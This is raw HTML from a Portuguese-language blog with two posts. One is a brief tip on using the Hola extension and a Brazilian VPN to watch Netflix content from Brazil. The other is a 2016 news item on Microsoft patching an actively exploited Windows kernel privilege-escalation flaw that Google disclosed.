<span style="font-family: "trebuchet ms" , sans-serif;"><img alt="Resultado de imagem para gvt e netflix" src="data:image/jpeg;base64,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" /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">No navegador do chrome baixe o plugin:</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">https://chrome.google.com/webstore/category/apps?hl=pt-BR</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">Procure por #hola:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI_-TUrbWNCN4FiGhhvMDZjlh0zHR99LD0ZtQT9j7jTrTJQAMxe5Nr6hEH2-lRYMZlsoJ6JEPoAv7AGhLuD4Adv_fWyikvQomt4xpiROFk8HwPL0OR-zrKVFpkOkaYXGIxPcY1dWjYlVup/s1600/hola.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="83" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI_-TUrbWNCN4FiGhhvMDZjlh0zHR99LD0ZtQT9j7jTrTJQAMxe5Nr6hEH2-lRYMZlsoJ6JEPoAv7AGhLuD4Adv_fWyikvQomt4xpiROFk8HwPL0OR-zrKVFpkOkaYXGIxPcY1dWjYlVup/s640/hola.JPG" width="640" /></a></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">Instale e utilize uma VPN do brasil, e pronto.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">Veja normalmente suas séries e filmes!!</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<br /></div>
<div>
<br /></div>
mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comtag:blogger.com,1999:blog-4472344379716989945.post-55689536672896030092016-11-09T12:43:00.001-02:002016-11-09T12:43:07.224-02:00Microsoft corrige falha de segurança do Windows sob o ataque de hackers<div class="td-post-content td-pb-padding-side" style="background-color: white; border-bottom-color: rgb(230, 230, 230); border-left-color: rgb(230, 230, 230); border-right-color: rgb(230, 230, 230); border-top: 1px solid rgb(230, 230, 230); box-sizing: border-box; color: #444444; font-family: Arimo; font-size: 17px; line-height: 30px; padding: 20px 19px 0px 20px;">
<div style="box-sizing: border-box; color: #222222; line-height: 30px; margin-bottom: 24px;">
A Microsoft corrigiu uma falha de segurança no Windows que estava sendo ativamente explorada por hackers.</div>
<div style="box-sizing: border-box; color: #222222; line-height: 30px; margin-bottom: 24px;">
<img src="http://www.colunatech.com.br/wp-content/uploads/2016/11/windows-colunatech-640x328.jpg" /></div>
<div style="box-sizing: border-box; color: #222222; line-height: 30px; margin-bottom: 24px;">
O software e os serviços de gigante lançaram o patch como parte de sua rodada mensal de patches de segurança, conhecido como Patch Tuesday .</div>
<div style="box-sizing: border-box; color: #222222; line-height: 30px; margin-bottom: 24px;">
Em <a href="https://technet.microsoft.com/library/security/MS16-135" style="background: transparent; box-sizing: border-box; color: #0a9e01; text-decoration: none !important;" target="_blank">um boletim de segurança</a> , a empresa disse que o “importante” patch irá corrigir múltiplas elevações de vulnerabilidades de privilégios, que podem ser exploradas por causa de como o driver de modo kernel do Windows manipula inadequadamente objetos na memória.</div>
<div style="box-sizing: border-box; color: #222222; line-height: 30px; margin-bottom: 24px;">
Um invasor teria que enganar o usuário a abrir um aplicativo especialmente trabalhado enquanto o usuário estivesse conectado ao computador.</div>
<div style="box-sizing: border-box; color: #222222; line-height: 30px; margin-bottom: 24px;">
Se explorada, esse invasor seria capaz de executar programas, excluir dados e criar novas contas com direitos totais de usuário e “tomar o controle de um sistema afetado”, disse o boletim.</div>
<div style="box-sizing: border-box; color: #222222; line-height: 30px; margin-bottom: 24px;">
Detalhes da segurança vulneráveis tinham sido revelados pelo Google.</div>
<div style="box-sizing: border-box; color: #222222; line-height: 30px; margin-bottom: 24px;">
A gigante das buscas revelou a falha citando provas de que os hackers estavam explorando a falha.</div>
<div style="box-sizing: border-box; color: #222222; line-height: 30px; margin-bottom: 24px;">
Microsoft confirmou a vulnerabilidade em seu <a href="http://www.zdnet.com/article/microsoft-to-patch-windows-security-flaw-under-attack-next-week/" style="background: transparent; box-sizing: border-box; color: #0a9e01; text-decoration: none !important;" target="_blank">próprio blog</a> .</div>
<section class="sharethrough-top" data-component="medusaContentRecommendation" data-medusa-content-recommendation-options="{"promo":"promo_ZD_recommendation_sharethrough_top_in_article_desktop","spot":"dfp-in-article"}" style="box-sizing: border-box;"><section class="leadgenads" id="content-recommendation" style="box-sizing: border-box;"><div style="box-sizing: border-box;">
</div>
</section></section><div style="box-sizing: border-box; color: #222222; line-height: 30px; margin-bottom: 24px;">
O presidente da Windows Terry Myerson disse que hackers russos, conhecidos como Strontium realizaram o ataque phishing de baixo volume, projetado para atacar um alvo ou organização.</div>
<div style="box-sizing: border-box; color: #222222; line-height: 30px; margin-bottom: 24px;">
Mas Myerson, irritado com a decisão do Google de divulgar publicamente a falha, disse que o Google colocou os usuários do Windows “em risco potencial”, como resultado da divulgação prematura.</div>
<div style="box-sizing: border-box; color: #222222; line-height: 30px; margin-bottom: 24px;">
Myerson disse que os usuários do Windows 10 da última atualização Anniversary não foram afetados pela falha.</div>
<div style="box-sizing: border-box; color: #222222; line-height: 30px; margin-bottom: 24px;">
Microsoft, no entanto, <a href="https://technet.microsoft.com/library/security/mt674627.aspx" style="background: transparent; box-sizing: border-box; color: #0a9e01; text-decoration: none !important;" target="_blank">reconheceu</a> dois pesquisadores do Google para encontrar a falha.</div>
<div style="box-sizing: border-box; color: #222222; line-height: 30px; margin-bottom: 24px;">
<span class="goog-text-highlight" style="box-sizing: border-box;">A empresa também fixou seis falhas críticas – incluindo um </span><a href="https://technet.microsoft.com/library/security/MS16-130" style="background: transparent; box-sizing: border-box; color: #0a9e01; text-decoration: none !important;" target="_blank">que afeta todas as versões do Windows</a><span class="goog-text-highlight" style="box-sizing: border-box;"> , junto com outros oito atualizações importantes, incluindo atualizações cumulativas para o Internet Explorer e seu navegador edge.</span></div>
</div>
<footer style="background-color: white; box-sizing: border-box; clear: both; color: #444444; font-family: Verdana, Geneva, sans-serif; font-size: 12px;"><div class="td-post-source-tags td-pb-padding-side" style="box-sizing: border-box; margin: 15px 0px 18px; padding: 0px 19px 0px 20px;">
<ul class="td-tags td-post-small-box clearfix" style="box-sizing: border-box; display: table; font-family: "Open Sans", arial, sans-serif; font-size: 9px; font-weight: 700; height: 15px; line-height: 15px; list-style-position: inside; margin: 0px; padding: 0px; text-transform: uppercase;">
<li style="box-sizing: border-box; display: inline-block; height: 15px; line-height: 15px; list-style: none; margin: 0px 0px 3px;"><span style="background-color: #444444; box-sizing: border-box; color: white; margin-right: 3px; padding: 1px 7px;">TAGS</span></li>
<li style="box-sizing: border-box; display: inline-block; height: 15px; line-height: 15px; list-style: none; margin: 0px 0px 3px;"><a href="http://www.colunatech.com.br/tag/microsoft/" style="background: rgb(165, 165, 165); box-sizing: border-box; color: white; margin: 0px 3px 0px 0px; padding: 1px 7px; text-decoration: none !important;">MICROSOFT</a></li>
<li style="box-sizing: border-box; display: inline-block; height: 15px; line-height: 15px; list-style: none; margin: 0px 0px 3px;"><a href="http://www.colunatech.com.br/tag/seguranca/" style="background: rgb(165, 165, 165); box-sizing: border-box; color: white; margin: 0px 3px 0px 0px; padding: 1px 7px; text-decoration: none !important;">SEGURANÇA</a></li>
<li style="box-sizing: border-box; display: inline-block; height: 15px; line-height: 15px; list-style: none; margin: 0px 0px 3px;"><a href="http://www.colunatech.com.br/tag/windows/" style="background: rgb(165, 165, 165); box-sizing: border-box; color: white; margin: 0px 3px 0px 0px; padding: 1px 7px; text-decoration: none !important;">WINDOWS</a></li>
<li style="box-sizing: border-box; display: inline-block; height: 15px; line-height: 15px; list-style: none; margin: 0px 0px 3px;"><a href="http://www.colunatech.com.br/tag/windows-10/" style="background: rgb(165, 165, 165); box-sizing: border-box; color: white; margin: 0px 3px 0px 0px; padding: 1px 7px; text-decoration: none !important;">WINDOWS 10</a></li>
</ul>
</div>
